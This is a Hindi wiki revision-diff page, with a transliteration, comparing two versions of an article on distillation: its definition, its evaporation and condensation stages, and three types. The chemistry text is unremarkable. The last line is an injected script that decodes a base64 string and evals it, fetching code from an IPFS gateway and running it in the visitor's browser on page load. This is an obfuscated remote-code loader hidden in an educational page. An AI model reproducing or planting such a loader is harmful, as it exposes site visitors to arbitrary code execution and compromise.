Difference between revisions of "आसवन विधि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Distillation) [[रसायन विज्ञान]] में जब दो द्रवों के [[क्वथनांक|क्वथनांकों]] में अन्तर अधिक होता है, तो उसके [[मिश्रण]] को आसवन विधि से पृथक करते हैं। अर्थात यह [[द्रव|द्रवों]] के मिश्रण को अलग करने की विधि है। इसका प्रथम भाग [[वाष्पीकरण]] एवं दूसरा भाग संघनन कहलाता है।
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Distillation) [[द्रव]] को गर्म करके वाष्प बनाना और फिर उस वाष्प को ठंडा करके द्रव के रूप में लाने की विधि को आसवन कहा जाता है। आसवन विधि द्वारा मुख्यतः द्रवों के [[मिश्रण]] को पृथक्‌ किया जाता है। [[रसायन विज्ञान]] में जब दो द्रवों के [[क्वथनांक|क्वथनांकों]] में अन्तर अधिक होता है, तो उसके मिश्रण को आसवन विधि से पृथक करते हैं। आवसन विधि में द्रव को वाष्प में परिणत कर किसी दूसरे स्थान में भेजा जाता है, जहाँ उसे ठंडा कर पुनः द्रव अवस्था में परिवर्तित कर लिया जाता है। आसवन का प्रथम भाग [[वाष्पीकरण]] एवं दूसरा भाग संघनन कहलाता है।  
 
==प्रकार==
 
==प्रकार==
 
आसवन विधि को तीन भागों में बांटा गया है-
 
आसवन विधि को तीन भागों में बांटा गया है-
Line 5: Line 5:
 
*निर्वात आसवन  
 
*निर्वात आसवन  
 
*प्रभंजक आसवन
 
*प्रभंजक आसवन
 
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 05:13, 24 October 2011

(aangrezi:Distillation) drav ko garm karake vashp banana aur phir us vashp ko thanda karake drav ke roop mean lane ki vidhi ko asavan kaha jata hai. asavan vidhi dvara mukhyatah dravoan ke mishran ko prithakh‌ kiya jata hai. rasayan vijnan mean jab do dravoan ke kvathanaankoan mean antar adhik hota hai, to usake mishran ko asavan vidhi se prithak karate haian. avasan vidhi mean drav ko vashp mean parinat kar kisi doosare sthan mean bheja jata hai, jahaan use thanda kar punah drav avastha mean parivartit kar liya jata hai. asavan ka pratham bhag vashpikaran evan doosara bhag sanghanan kahalata hai.

prakar

asavan vidhi ko tin bhagoan mean baanta gaya hai-

  • prabhajit asavan
  • nirvat asavan
  • prabhanjak asavan


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>